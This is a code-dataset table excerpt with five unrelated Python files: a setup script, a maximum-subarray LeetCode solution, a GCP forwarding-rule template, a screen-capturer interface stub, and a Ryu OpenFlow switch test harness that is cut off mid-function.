| code (stringlengths 3 to 1.05M) | repo_name (stringlengths 5 to 104) | path (stringlengths 4 to 251) | language (stringclasses 1) | license (stringclasses 15) | size (int64, 3 to 1.05M) |
|---|---|---|---|---|---|
#!/usr/bin/env python3
from setuptools import setup
setup()
| scienceopen/pyAIRtools | setup.py | Python | bsd-3-clause | 61 |
import math

class Solution:
# returns sum of contiguous non-empty subarray with greatest sum
def maxSubArray(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
sumCurr = 0
sumMax = -math.inf
for i in range(len(nums)):
sumCurr += nums[i]
if sumCurr > sumMax: # this is checked before negativity in case entire array is negative - in that case the one with the least absolute value will be returned
sumMax = sumCurr
if sumCurr < 0:
sumCurr = 0
return sumMax
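# A minimal usage sketch (not from the original LeetCode submission): it illustrates
# the case the inline comment above describes - because the max is updated before the
# running sum is reset, an all-negative input returns its largest (least negative) element.
if __name__ == "__main__":
    s = Solution()
    assert s.maxSubArray([-2, 1, -3, 4, -1, 2, 1, -5, 4]) == 6  # best subarray: [4, -1, 2, 1]
    assert s.maxSubArray([-3, -1, -7]) == -1  # all-negative: least negative element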
| SelvorWhim/competitive | LeetCode/MaximumSubarray.py | Python | unlicense | 588 |
# Copyright 2018 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" This template creates a forwarding rule. """
REGIONAL_GLOBAL_TYPE_NAMES = {
# https://cloud.google.com/compute/docs/reference/rest/v1/forwardingRules
True: {
'GA': 'gcp-types/compute-v1:forwardingRules',
'Beta': 'gcp-types/compute-beta:forwardingRules'
},
# https://cloud.google.com/compute/docs/reference/rest/v1/globalForwardingRules
False: {
'GA': 'gcp-types/compute-v1:globalForwardingRules',
'Beta': 'gcp-types/compute-beta:globalForwardingRules'
}
}
def set_optional_property(destination, source, prop_name):
""" Copies the property value, if present. """
if prop_name in source:
destination[prop_name] = source[prop_name]
def get_forwarding_rule_outputs(res_name, region):
""" Creates outputs for the forwarding rule. """
outputs = [
{
'name': 'name',
'value': '$(ref.{}.name)'.format(res_name)
},
{
'name': 'selfLink',
'value': '$(ref.{}.selfLink)'.format(res_name)
},
{
'name': 'IPAddress',
'value': '$(ref.{}.IPAddress)'.format(res_name)
}
]
if region:
outputs.append({'name': 'region', 'value': region})
return outputs
def generate_config(context):
""" Entry point for the deployment resources. """
properties = context.properties
name = properties.get('name', context.env['name'])
project_id = properties.get('project', context.env['project'])
is_regional = 'region' in properties
FW_rule_version = 'Beta' if 'labels' in properties else 'GA'
region = properties.get('region')
rule_properties = {
'name': name,
'project': project_id,
}
resource = {
'name': context.env['name'],
'type': REGIONAL_GLOBAL_TYPE_NAMES[is_regional][FW_rule_version],
'properties': rule_properties
}
optional_properties = [
'description',
'IPAddress',
'IPProtocol',
'portRange',
'ports',
'region',
'target',
'loadBalancingScheme',
'subnetwork',
'network',
'backendService',
'ipVersion',
'serviceLabel',
'networkTier',
'allPorts',
'labels',
]
for prop in optional_properties:
set_optional_property(rule_properties, properties, prop)
outputs = get_forwarding_rule_outputs(context.env['name'], region)
return {'resources': [resource], 'outputs': outputs}
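# Illustrative sketch only (not part of the original template): with hypothetical input
# properties such as {'name': 'my-rule', 'region': 'us-central1', 'IPProtocol': 'TCP',
# 'portRange': '80'} and env {'name': 'fw-rule', 'project': 'my-project'},
# generate_config() would produce a single regional GA resource of type
# 'gcp-types/compute-v1:forwardingRules' (Beta is only chosen when 'labels' is set),
# whose properties carry name, project, region, IPProtocol and portRange, plus
# name/selfLink/IPAddress/region outputs that reference the 'fw-rule' resource.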
| GoogleCloudPlatform/cloud-foundation-toolkit | dm/templates/forwarding_rule/forwarding_rule.py | Python | apache-2.0 | 3,116 |
class Capturer:
    def toggle_saving_images(self):
pass
def save_images_dir(self, path):
pass
def save_images_speed(self,parity):
pass
def start_capture(self):
pass
def log(self,string):
pass
def get_last_frame_pil(self):
pass
def get_last_frame_bytestring(self):
pass
def get_capture_rect(self):
pass
def get_image_size(self):
pass
| detorto/mariobot | Capture/Capturer.py | Python | mit | 446 |
# Copyright (C) 2013 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import json
import logging
import logging.handlers
import os
import signal
import sys
import traceback
from oslo.config import cfg
# import all packet libraries.
PKT_LIB_PATH = 'ryu.lib.packet'
for modname, moddef in sys.modules.iteritems():
if not modname.startswith(PKT_LIB_PATH) or not moddef:
continue
for (clsname, clsdef, ) in inspect.getmembers(moddef):
if not inspect.isclass(clsdef):
continue
exec 'from %s import %s' % (modname, clsname)
from ryu.base import app_manager
from ryu.controller import handler
from ryu.controller import ofp_event
from ryu.controller.handler import set_ev_cls
from ryu.exception import RyuException
from ryu.lib import dpid as dpid_lib
from ryu.lib import hub
from ryu.lib import stringify
from ryu.lib.packet import packet
from ryu.ofproto import ofproto_v1_3
from ryu.ofproto import ofproto_v1_3_parser
""" Required test network:
+-----------+
+----------| target sw | The switch to be tested
| +-----------+
+------------+ (1) (2)
| controller | | |
+------------+ (1) (2)
| +-----------+
+----------| tester sw | OpenFlow Switch
+-----------+
(X) : port number
Tests send a packet from port 1 of the tester sw.
If the packet matches a flow entry of the target sw,
the target sw resends the packet from port 2 (or the port
connected to the controller), according to the flow entry.
Then the tester sw receives the packet and sends a PacketIn message.
If the packet does not match, the target sw drops the packet.
"""
CONF = cfg.CONF
# Default settings.
TESTER_SENDER_PORT = 1
TESTER_RECEIVE_PORT = 2
TARGET_SENDER_PORT = 2
TARGET_RECEIVE_PORT = 1
INTERVAL = 1 # sec
WAIT_TIMER = 3 # sec
# Test file format.
KEY_DESC = 'description'
KEY_PREREQ = 'prerequisite'
KEY_FLOW = 'OFPFlowMod'
KEY_TESTS = 'tests'
KEY_INGRESS = 'ingress'
KEY_EGRESS = 'egress'
KEY_PKT_IN = 'PACKET_IN'
KEY_TBL_MISS = 'table-miss'
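# A hedged sketch (inferred from the TestFile/Test parsing classes below, not taken
# from the original file) of what a *.json test file is expected to contain: a JSON
# list whose string element is the file description and whose dict elements are tests.
#
# [
#     "sample: match on in_port",
#     {
#         "description": "in_port=1 -> output:2",
#         "prerequisite": [{"OFPFlowMod": {...}}],
#         "tests": [{"ingress": ["ethernet(...)", "ipv4(...)"],
#                    "egress": ["ethernet(...)", "ipv4(...)"]}]
#     }
# ]
#
# Each entry in "tests" must hold exactly two keys: "ingress" plus one of "egress",
# "PACKET_IN" or "table-miss"; the packet fields are strings that are joined and
# evaluated against the ryu.lib.packet classes imported above.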
# Test state.
STATE_INIT = 0
STATE_FLOW_INSTALL = 1
STATE_FLOW_EXIST_CHK = 2
STATE_TARGET_PKT_COUNT = 3
STATE_TESTER_PKT_COUNT = 4
STATE_FLOW_MATCH_CHK = 5
STATE_NO_PKTIN_REASON = 6
STATE_GET_MATCH_COUNT = 7
STATE_UNMATCH_PKT_SEND = 8
STATE_FLOW_UNMATCH_CHK = 9
# Test result.
TEST_OK = 'OK'
TEST_ERROR = 'ERROR'
RYU_INTERNAL_ERROR = '- (Ryu internal error.)'
TEST_FILE_ERROR = '%(file)s : Test file format error (%(detail)s)'
NO_TEST_FILE = 'Test file (*.json) is not found.'
INVALID_PATH = '%(path)s : No such file or directory.'
# Test result details.
FAILURE = 0
ERROR = 1
TIMEOUT = 2
RCV_ERR = 3
MSG = {STATE_INIT:
{TIMEOUT: 'Failed to initialize flow tables: barrier request timeout.',
RCV_ERR: 'Failed to initialize flow tables: %(err_msg)s'},
STATE_FLOW_INSTALL:
{TIMEOUT: 'Failed to add flows: barrier request timeout.',
RCV_ERR: 'Failed to add flows: %(err_msg)s'},
STATE_FLOW_EXIST_CHK:
{FAILURE: 'Added incorrect flows: %(flows)s',
TIMEOUT: 'Failed to add flows: flow stats request timeout.',
RCV_ERR: 'Failed to add flows: %(err_msg)s'},
STATE_TARGET_PKT_COUNT:
{TIMEOUT: 'Failed to request port stats from target: request timeout.',
RCV_ERR: 'Failed to request port stats from target: %(err_msg)s'},
STATE_TESTER_PKT_COUNT:
{TIMEOUT: 'Failed to request port stats from tester: request timeout.',
RCV_ERR: 'Failed to request port stats from tester: %(err_msg)s'},
STATE_FLOW_MATCH_CHK:
{FAILURE: 'Received incorrect %(pkt_type)s: %(detail)s',
TIMEOUT: '', # for check no packet-in reason.
RCV_ERR: 'Failed to send packet: %(err_msg)s'},
STATE_NO_PKTIN_REASON:
{FAILURE: 'Receiving timeout: %(detail)s'},
STATE_GET_MATCH_COUNT:
{TIMEOUT: 'Failed to request table stats: request timeout.',
RCV_ERR: 'Failed to request table stats: %(err_msg)s'},
STATE_UNMATCH_PKT_SEND:
       {TIMEOUT: 'Failed to send packet: barrier request timeout.',
        RCV_ERR: 'Failed to send packet: %(err_msg)s'},
STATE_FLOW_UNMATCH_CHK:
{FAILURE: 'Table-miss error: increment in matched_count.',
ERROR: 'Table-miss error: no change in lookup_count.',
TIMEOUT: 'Failed to request table stats: request timeout.',
RCV_ERR: 'Failed to request table stats: %(err_msg)s'}}
ERR_MSG = 'OFPErrorMsg[type=0x%02x, code=0x%02x]'
class TestMessageBase(RyuException):
def __init__(self, state, message_type, **argv):
msg = MSG[state][message_type] % argv
super(TestMessageBase, self).__init__(msg=msg)
class TestFailure(TestMessageBase):
def __init__(self, state, **argv):
super(TestFailure, self).__init__(state, FAILURE, **argv)
class TestTimeout(TestMessageBase):
def __init__(self, state):
super(TestTimeout, self).__init__(state, TIMEOUT)
class TestReceiveError(TestMessageBase):
def __init__(self, state, err_msg):
argv = {'err_msg': ERR_MSG % (err_msg.type, err_msg.code)}
super(TestReceiveError, self).__init__(state, RCV_ERR, **argv)
class TestError(TestMessageBase):
def __init__(self, state, **argv):
super(TestError, self).__init__(state, ERROR, **argv)
class OfTester(app_manager.RyuApp):
""" OpenFlow Switch Tester. """
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
def __init__(self):
super(OfTester, self).__init__()
self._set_logger()
self.target_dpid = self._convert_dpid(CONF['test-switch']['target'])
self.tester_dpid = self._convert_dpid(CONF['test-switch']['tester'])
self.logger.info('target_dpid=%s',
dpid_lib.dpid_to_str(self.target_dpid))
self.logger.info('tester_dpid=%s',
dpid_lib.dpid_to_str(self.tester_dpid))
test_dir = CONF['test-switch']['dir']
self.logger.info('Test files directory = %s', test_dir)
self.target_sw = None
self.tester_sw = None
self.state = STATE_INIT
self.sw_waiter = None
self.waiter = None
self.send_msg_xids = []
self.rcv_msgs = []
self.test_thread = hub.spawn(
self._test_sequential_execute, test_dir)
def _set_logger(self):
self.logger.propagate = False
s_hdlr = logging.StreamHandler()
self.logger.addHandler(s_hdlr)
if CONF.log_file:
f_hdlr = logging.handlers.WatchedFileHandler(CONF.log_file)
self.logger.addHandler(f_hdlr)
def _convert_dpid(self, dpid_str):
try:
dpid = int(dpid_str, 16)
except ValueError as err:
            self.logger.error('Invalid dpid parameter. %s', err)
self._test_end()
return dpid
def close(self):
if self.test_thread is not None:
hub.kill(self.test_thread)
hub.joinall([self.test_thread])
self._test_end('--- Test terminated ---')
@set_ev_cls(ofp_event.EventOFPStateChange,
[handler.MAIN_DISPATCHER, handler.DEAD_DISPATCHER])
    def dispatcher_change(self, ev):
assert ev.datapath is not None
if ev.state == handler.MAIN_DISPATCHER:
self._register_sw(ev.datapath)
elif ev.state == handler.DEAD_DISPATCHER:
self._unregister_sw(ev.datapath)
def _register_sw(self, dp):
if dp.id == self.target_dpid:
self.target_sw = TargetSw(dp, self.logger)
msg = 'Join target SW.'
elif dp.id == self.tester_dpid:
self.tester_sw = TesterSw(dp, self.logger)
msg = 'Join tester SW.'
else:
msg = 'Connect unknown SW.'
if dp.id:
self.logger.info('dpid=%s : %s',
dpid_lib.dpid_to_str(dp.id), msg)
if self.target_sw and self.tester_sw:
if self.sw_waiter is not None:
self.sw_waiter.set()
def _unregister_sw(self, dp):
if dp.id == self.target_dpid:
del self.target_sw
self.target_sw = None
msg = 'Leave target SW.'
elif dp.id == self.tester_dpid:
del self.tester_sw
self.tester_sw = None
msg = 'Leave tester SW.'
else:
msg = 'Disconnect unknown SW.'
if dp.id:
self.logger.info('dpid=%s : %s',
dpid_lib.dpid_to_str(dp.id), msg)
def _test_sequential_execute(self, test_dir):
""" Execute OpenFlow Switch test. """
# Parse test pattern from test files.
tests = TestPatterns(test_dir, self.logger)
if not tests:
self.logger.warning(NO_TEST_FILE)
self._test_end()
test_report = {}
self.logger.info('--- Test start ---')
test_keys = tests.keys()
test_keys.sort()
for file_name in test_keys:
report = self._test_file_execute(tests[file_name])
for result, descriptions in report.items():
test_report.setdefault(result, [])
test_report[result].extend(descriptions)
self._test_end(msg='--- Test end ---', report=test_report)
def _test_file_execute(self, testfile):
report = {}
for i, test in enumerate(testfile.tests):
desc = testfile.description if i == 0 else None
result = self._test_execute(test, desc)
report.setdefault(result, [])
report[result].append([testfile.description, test.description])
return report
def _test_execute(self, test, description):
if not self.target_sw or not self.tester_sw:
self.logger.info('waiting for switches connection...')
self.sw_waiter = hub.Event()
self.sw_waiter.wait()
self.sw_waiter = None
if description:
self.logger.info('%s', description)
# Test execute.
try:
# 0. Initialize.
self._test(STATE_INIT)
# 1. Install flows.
for flow in test.prerequisite:
self._test(STATE_FLOW_INSTALL, flow)
self._test(STATE_FLOW_EXIST_CHK, flow)
# 2. Check flow matching.
for pkt in test.tests:
if KEY_EGRESS in pkt or KEY_PKT_IN in pkt:
target_pkt_count = [self._test(STATE_TARGET_PKT_COUNT,
True)]
tester_pkt_count = [self._test(STATE_TESTER_PKT_COUNT,
False)]
result = self._test(STATE_FLOW_MATCH_CHK, pkt)
if result == TIMEOUT:
target_pkt_count.append(self._test(
STATE_TARGET_PKT_COUNT, True))
tester_pkt_count.append(self._test(
STATE_TESTER_PKT_COUNT, False))
test_type = (KEY_EGRESS if KEY_EGRESS in pkt
else KEY_PKT_IN)
self._test(STATE_NO_PKTIN_REASON, test_type,
target_pkt_count, tester_pkt_count)
else:
before_stats = self._test(STATE_GET_MATCH_COUNT)
self._test(STATE_UNMATCH_PKT_SEND, pkt)
hub.sleep(INTERVAL)
self._test(STATE_FLOW_UNMATCH_CHK, before_stats, pkt)
result = [TEST_OK]
result_type = TEST_OK
except (TestFailure, TestError,
TestTimeout, TestReceiveError) as err:
result = [TEST_ERROR, str(err)]
result_type = str(err).split(':', 1)[0]
except Exception:
result = [TEST_ERROR, RYU_INTERNAL_ERROR]
result_type = RYU_INTERNAL_ERROR
# Output test result.
self.logger.info(' %-100s %s', test.description, result[0])
if 1 < len(result):
self.logger.info(' %s', result[1])
if (result[1] == RYU_INTERNAL_ERROR
or result == 'An unknown exception'):
self.logger.error(traceback.format_exc())
if result[0] != TEST_OK and self.state == STATE_INIT:
self._test_end('--- Test terminated ---')
hub.sleep(0)
return result_type
def _test_end(self, msg=None, report=None):
self.test_thread = None
if msg:
self.logger.info(msg)
if report:
self._output_test_report(report)
pid = os.getpid()
os.kill(pid, signal.SIGTERM)
def _output_test_report(self, report):
self.logger.info('%s--- Test report ---', os.linesep)
ok_count = error_count = 0
for result_type in sorted(report.keys()):
test_descriptions = report[result_type]
if result_type == TEST_OK:
ok_count = len(test_descriptions)
continue
error_count += len(test_descriptions)
self.logger.info('%s(%d)', result_type, len(test_descriptions))
for file_desc, test_desc in test_descriptions:
self.logger.info(' %-40s %s', file_desc, test_desc)
self.logger.info('%s%s(%d) / %s(%d)', os.linesep,
TEST_OK, ok_count, TEST_ERROR, error_count)
def _test(self, state, *args):
test = {STATE_INIT: self._test_initialize,
STATE_FLOW_INSTALL: self._test_flow_install,
STATE_FLOW_EXIST_CHK: self._test_flow_exist_check,
STATE_TARGET_PKT_COUNT: self._test_get_packet_count,
STATE_TESTER_PKT_COUNT: self._test_get_packet_count,
STATE_FLOW_MATCH_CHK: self._test_flow_matching_check,
STATE_NO_PKTIN_REASON: self._test_no_pktin_reason_check,
STATE_GET_MATCH_COUNT: self._test_get_match_count,
STATE_UNMATCH_PKT_SEND: self._test_unmatch_packet_send,
STATE_FLOW_UNMATCH_CHK: self._test_flow_unmatching_check}
self.send_msg_xids = []
self.rcv_msgs = []
self.state = state
return test[state](*args)
def _test_initialize(self):
xid = self.target_sw.del_test_flow()
self.send_msg_xids.append(xid)
xid = self.target_sw.send_barrier_request()
self.send_msg_xids.append(xid)
self._wait()
assert len(self.rcv_msgs) == 1
msg = self.rcv_msgs[0]
assert isinstance(msg, ofproto_v1_3_parser.OFPBarrierReply)
def _test_flow_install(self, flow):
xid = self.target_sw.add_flow(flow_mod=flow)
self.send_msg_xids.append(xid)
xid = self.target_sw.send_barrier_request()
self.send_msg_xids.append(xid)
self._wait()
assert len(self.rcv_msgs) == 1
msg = self.rcv_msgs[0]
assert isinstance(msg, ofproto_v1_3_parser.OFPBarrierReply)
def _test_flow_exist_check(self, flow_mod):
xid = self.target_sw.send_flow_stats()
self.send_msg_xids.append(xid)
self._wait()
ng_stats = []
for msg in self.rcv_msgs:
assert isinstance(msg, ofproto_v1_3_parser.OFPFlowStatsReply)
for stats in msg.body:
result, stats = self._compare_flow(stats, flow_mod)
if result:
return
else:
ng_stats.append(stats)
raise TestFailure(self.state, flows=', '.join(ng_stats))
def _test_get_packet_count(self, is_target):
sw = self.target_sw if is_target else self.tester_sw
xid = sw.send_port_stats()
self.send_msg_xids.append(xid)
self._wait()
result = {}
for msg in self.rcv_msgs:
for stats in msg.body:
result[stats.port_no] = {'rx': stats.rx_packets,
'tx': stats.tx_packets}
return result
def _test_flow_matching_check(self, pkt):
self.logger.debug("send_packet:[%s]", packet.Packet(pkt[KEY_INGRESS]))
self.logger.debug("egress:[%s]", packet.Packet(pkt.get(KEY_EGRESS)))
self.logger.debug("packet_in:[%s]",
packet.Packet(pkt.get(KEY_PKT_IN)))
# 1. send a packet from the OpenFlow Switch.
xid = self.tester_sw.send_packet_out(pkt[KEY_INGRESS])
self.send_msg_xids.append(xid)
# 2. receive a PacketIn message.
try:
self._wait()
except TestTimeout:
return TIMEOUT
assert len(self.rcv_msgs) == 1
msg = self.rcv_msgs[0]
assert isinstance(msg, ofproto_v1_3_parser.OFPPacketIn)
self.logger.debug("dpid=%s : receive_packet[%s]",
dpid_lib.dpid_to_str(msg.datapath.id),
packet.Packet(msg.data))
        # 3. Check which switch sent the PacketIn, and check the output packet.
pkt_in_src_model = (self.tester_sw if KEY_EGRESS in pkt
else self.target_sw)
model_pkt = (pkt[KEY_EGRESS] if KEY_EGRESS in pkt
else pkt[KEY_PKT_IN])
if msg.datapath.id != pkt_in_src_model.dp.id:
pkt_type = 'packet-in'
err_msg = 'SW[dpid=%s]' % dpid_lib.dpid_to_str(msg.datapath.id)
elif msg.reason != ofproto_v1_3.OFPR_ACTION:
pkt_type = 'packet-in'
err_msg = 'OFPPacketIn[reason=%d]' % msg.reason
elif repr(msg.data) != repr(model_pkt):
pkt_type = 'packet'
err_msg = self._diff_packets(packet.Packet(model_pkt),
packet.Packet(msg.data))
else:
return TEST_OK
raise TestFailure(self.state, pkt_type=pkt_type,
detail=err_msg)
def _test_no_pktin_reason_check(self, test_type,
target_pkt_count, tester_pkt_count):
before_target_receive = target_pkt_count[0][TARGET_RECEIVE_PORT]['rx']
before_target_send = target_pkt_count[0][TARGET_SENDER_PORT]['tx']
before_tester_receive = tester_pkt_count[0][TESTER_RECEIVE_PORT]['rx']
before_tester_send = tester_pkt_count[0][TESTER_SENDER_PORT]['tx']
after_target_receive = target_pkt_count[1][TARGET_RECEIVE_PORT]['rx']
after_target_send = target_pkt_count[1][TARGET_SENDER_PORT]['tx']
after_tester_receive = tester_pkt_count[1][TESTER_RECEIVE_PORT]['rx']
after_tester_send = tester_pkt_count[1][TESTER_SENDER_PORT]['tx']
if after_tester_send == before_tester_send:
log_msg = 'no change in tx_packets on tester.'
elif after_target_receive == before_target_receive:
            log_msg = 'no change in rx_packets on target.'
elif test_type == KEY_EGRESS:
if after_target_send == before_target_send:
log_msg = 'no change in tx_packets on target.'
elif after_tester_receive == before_tester_receive:
log_msg = 'no change in rx_packets on tester.'
else:
                log_msg = 'increment in rx_packets on tester.'
else:
assert test_type == KEY_PKT_IN
log_msg = 'no packet-in.'
raise TestFailure(self.state, detail=log_msg)
def _test_get_match_count(self):
xid = self.target_sw.send_table_stats()
self.send_msg_xids.append(xid)
self._wait()
result = {}
for msg in self.rcv_msgs:
for stats in msg.body:
result[stats.table_id] = {'lookup': stats.lookup_count,
'matched': stats.matched_count}
return result
def _test_unmatch_packet_send(self, pkt):
# Send a packet from the OpenFlow Switch.
self.logger.debug("send_packet:[%s]", packet.Packet(pkt[KEY_INGRESS]))
self.tester_sw.send_packet_out(pkt[KEY_INGRESS])
# Wait OFPBarrierReply.
xid = self.tester_sw.send_barrier_request()
self.send_msg_xids.append(xid)
self._wait()
assert len(self.rcv_msgs) == 1
msg = self.rcv_msgs[0]
assert isinstance(msg, ofproto_v1_3_parser.OFPBarrierReply)
def _test_flow_unmatching_check(self, before_stats, pkt):
# Check matched packet count.
rcv_msgs = self._test_get_match_count()
lookup = False
for target_tbl_id in pkt[KEY_TBL_MISS]:
before = before_stats[target_tbl_id]
after = rcv_msgs[target_tbl_id]
if before['lookup'] < after['lookup']:
lookup = True
if before['matched'] < after['matched']:
raise TestFailure(self.state)
if not lookup:
raise TestError(self.state)
def _compare_flow(self, stats1, stats2):
attr_list = ['cookie', 'priority', 'hard_timeout', 'idle_timeout',
'table_id', 'instructions', 'match']
for attr in attr_list:
value1 = getattr(stats1, attr)
value2 = getattr(stats2, attr)
if attr == 'instructions':
value1 = sorted(value1)
value2 = sorted(value2)
if str(value1) != str(value2):
flow_stats = []
for attr in attr_list:
flow_stats.append('%s=%s' % (attr, getattr(stats1, attr)))
return False, 'flow_stats(%s)' % ','.join(flow_stats)
return True, None
def _diff_packets(self, model_pkt, rcv_pkt):
msg = []
for rcv_p in rcv_pkt.protocols:
if type(rcv_p) != str:
model_protocols = model_pkt.get_protocols(type(rcv_p))
if len(model_protocols) == 1:
model_p = model_protocols[0]
diff = []
for attr in rcv_p.__dict__:
if attr.startswith('_'):
continue
if callable(attr):
continue
if hasattr(rcv_p.__class__, attr):
continue
rcv_attr = repr(getattr(rcv_p, attr))
model_attr = repr(getattr(model_p, attr))
if rcv_attr != model_attr:
diff.append('%s=%s' % (attr, rcv_attr))
if diff:
msg.append('%s(%s)' %
(rcv_p.__class__.__name__,
','.join(diff)))
else:
if (not model_protocols or
not str(rcv_p) in str(model_protocols)):
msg.append(str(rcv_p))
else:
model_p = ''
for p in model_pkt.protocols:
if type(p) == str:
model_p = p
break
if model_p != rcv_p:
msg.append('str(%s)' % repr(rcv_p))
if msg:
return '/'.join(msg)
else:
            return ('Encountered an error during packet comparison.'
                    ' The packet may be malformed.')
def _wait(self):
""" Wait until specific OFP message received
or timer is exceeded. """
assert self.waiter is None
self.waiter = hub.Event()
self.rcv_msgs = []
timeout = False
timer = hub.Timeout(WAIT_TIMER)
try:
self.waiter.wait()
except hub.Timeout as t:
if t is not timer:
raise RyuException('Internal error. Not my timeout.')
timeout = True
finally:
timer.cancel()
self.waiter = None
if timeout:
raise TestTimeout(self.state)
if (self.rcv_msgs and isinstance(
self.rcv_msgs[0], ofproto_v1_3_parser.OFPErrorMsg)):
raise TestReceiveError(self.state, self.rcv_msgs[0])
@set_ev_cls(ofp_event.EventOFPFlowStatsReply, handler.MAIN_DISPATCHER)
def flow_stats_reply_handler(self, ev):
state_list = [STATE_FLOW_EXIST_CHK]
if self.state in state_list:
if self.waiter and ev.msg.xid in self.send_msg_xids:
self.rcv_msgs.append(ev.msg)
if not ev.msg.flags & ofproto_v1_3.OFPMPF_REPLY_MORE:
self.waiter.set()
hub.sleep(0)
@set_ev_cls(ofp_event.EventOFPTableStatsReply, handler.MAIN_DISPATCHER)
def table_stats_reply_handler(self, ev):
state_list = [STATE_GET_MATCH_COUNT,
STATE_FLOW_UNMATCH_CHK]
if self.state in state_list:
if self.waiter and ev.msg.xid in self.send_msg_xids:
self.rcv_msgs.append(ev.msg)
if not ev.msg.flags & ofproto_v1_3.OFPMPF_REPLY_MORE:
self.waiter.set()
hub.sleep(0)
@set_ev_cls(ofp_event.EventOFPPortStatsReply, handler.MAIN_DISPATCHER)
def port_stats_reply_handler(self, ev):
state_list = [STATE_TARGET_PKT_COUNT,
STATE_TESTER_PKT_COUNT]
if self.state in state_list:
if self.waiter and ev.msg.xid in self.send_msg_xids:
self.rcv_msgs.append(ev.msg)
if not ev.msg.flags & ofproto_v1_3.OFPMPF_REPLY_MORE:
self.waiter.set()
hub.sleep(0)
@set_ev_cls(ofp_event.EventOFPBarrierReply, handler.MAIN_DISPATCHER)
def barrier_reply_handler(self, ev):
state_list = [STATE_INIT,
STATE_FLOW_INSTALL,
STATE_UNMATCH_PKT_SEND]
if self.state in state_list:
if self.waiter and ev.msg.xid in self.send_msg_xids:
self.rcv_msgs.append(ev.msg)
self.waiter.set()
hub.sleep(0)
@set_ev_cls(ofp_event.EventOFPPacketIn, handler.MAIN_DISPATCHER)
def packet_in_handler(self, ev):
state_list = [STATE_FLOW_MATCH_CHK]
if self.state in state_list:
if self.waiter:
self.rcv_msgs.append(ev.msg)
self.waiter.set()
hub.sleep(0)
@set_ev_cls(ofp_event.EventOFPErrorMsg, [handler.HANDSHAKE_DISPATCHER,
handler.CONFIG_DISPATCHER,
handler.MAIN_DISPATCHER])
def error_msg_handler(self, ev):
if ev.msg.xid in self.send_msg_xids:
self.rcv_msgs.append(ev.msg)
if self.waiter:
self.waiter.set()
hub.sleep(0)
class OpenFlowSw(object):
def __init__(self, dp, logger):
super(OpenFlowSw, self).__init__()
self.dp = dp
self.logger = logger
def _send_msg(self, msg):
msg.xid = None
self.dp.set_xid(msg)
self.dp.send_msg(msg)
return msg.xid
def add_flow(self, flow_mod=None, in_port=None, out_port=None):
""" Add flow. """
ofp = self.dp.ofproto
parser = self.dp.ofproto_parser
if flow_mod:
mod = flow_mod
else:
match = parser.OFPMatch(in_port=in_port)
max_len = (0 if out_port != ofp.OFPP_CONTROLLER
else ofp.OFPCML_MAX)
actions = [parser.OFPActionOutput(out_port, max_len)]
inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS,
actions)]
mod = parser.OFPFlowMod(self.dp, cookie=0,
command=ofp.OFPFC_ADD,
match=match, instructions=inst)
return self._send_msg(mod)
def send_barrier_request(self):
""" send a BARRIER_REQUEST message."""
parser = self.dp.ofproto_parser
req = parser.OFPBarrierRequest(self.dp)
return self._send_msg(req)
def send_port_stats(self):
""" Get port stats."""
ofp = self.dp.ofproto
parser = self.dp.ofproto_parser
flags = 0
req = parser.OFPPortStatsRequest(self.dp, flags, ofp.OFPP_ANY)
return self._send_msg(req)
class TargetSw(OpenFlowSw):
def __init__(self, dp, logger):
super(TargetSw, self).__init__(dp, logger)
def del_test_flow(self):
""" Delete all flow except default flow. """
ofp = self.dp.ofproto
parser = self.dp.ofproto_parser
mod = parser.OFPFlowMod(self.dp,
table_id=ofp.OFPTT_ALL,
command=ofp.OFPFC_DELETE,
out_port=ofp.OFPP_ANY,
out_group=ofp.OFPG_ANY)
return self._send_msg(mod)
def send_flow_stats(self):
""" Get all flow. """
ofp = self.dp.ofproto
parser = self.dp.ofproto_parser
req = parser.OFPFlowStatsRequest(self.dp, 0, ofp.OFPTT_ALL,
ofp.OFPP_ANY, ofp.OFPG_ANY,
0, 0, parser.OFPMatch())
return self._send_msg(req)
def send_table_stats(self):
""" Get table stats. """
parser = self.dp.ofproto_parser
req = parser.OFPTableStatsRequest(self.dp, 0)
return self._send_msg(req)
class TesterSw(OpenFlowSw):
def __init__(self, dp, logger):
super(TesterSw, self).__init__(dp, logger)
# Add packet in flow.
ofp = self.dp.ofproto
self.add_flow(in_port=TESTER_RECEIVE_PORT,
out_port=ofp.OFPP_CONTROLLER)
def send_packet_out(self, data):
""" send a PacketOut message."""
ofp = self.dp.ofproto
parser = self.dp.ofproto_parser
actions = [parser.OFPActionOutput(TESTER_SENDER_PORT)]
out = parser.OFPPacketOut(
datapath=self.dp, buffer_id=ofp.OFP_NO_BUFFER,
data=data, in_port=ofp.OFPP_CONTROLLER, actions=actions)
return self._send_msg(out)
class TestPatterns(dict):
""" List of Test class objects. """
def __init__(self, test_dir, logger):
super(TestPatterns, self).__init__()
self.logger = logger
# Parse test pattern from test files.
self._get_tests(test_dir)
def _get_tests(self, path):
if not os.path.exists(path):
msg = INVALID_PATH % {'path': path}
self.logger.warning(msg)
return
if os.path.isdir(path): # Directory
for test_path in os.listdir(path):
test_path = path + (test_path if path[-1:] == '/'
else '/%s' % test_path)
self._get_tests(test_path)
elif os.path.isfile(path): # File
(dummy, ext) = os.path.splitext(path)
if ext == '.json':
test = TestFile(path, self.logger)
self[test.description] = test
class TestFile(stringify.StringifyMixin):
"""Test File object include Test objects."""
def __init__(self, path, logger):
super(TestFile, self).__init__()
self.logger = logger
self.description = None
self.tests = []
self._get_tests(path)
def _get_tests(self, path):
with open(path, 'rb') as fhandle:
buf = fhandle.read()
try:
json_list = json.loads(buf)
for test_json in json_list:
if isinstance(test_json, unicode):
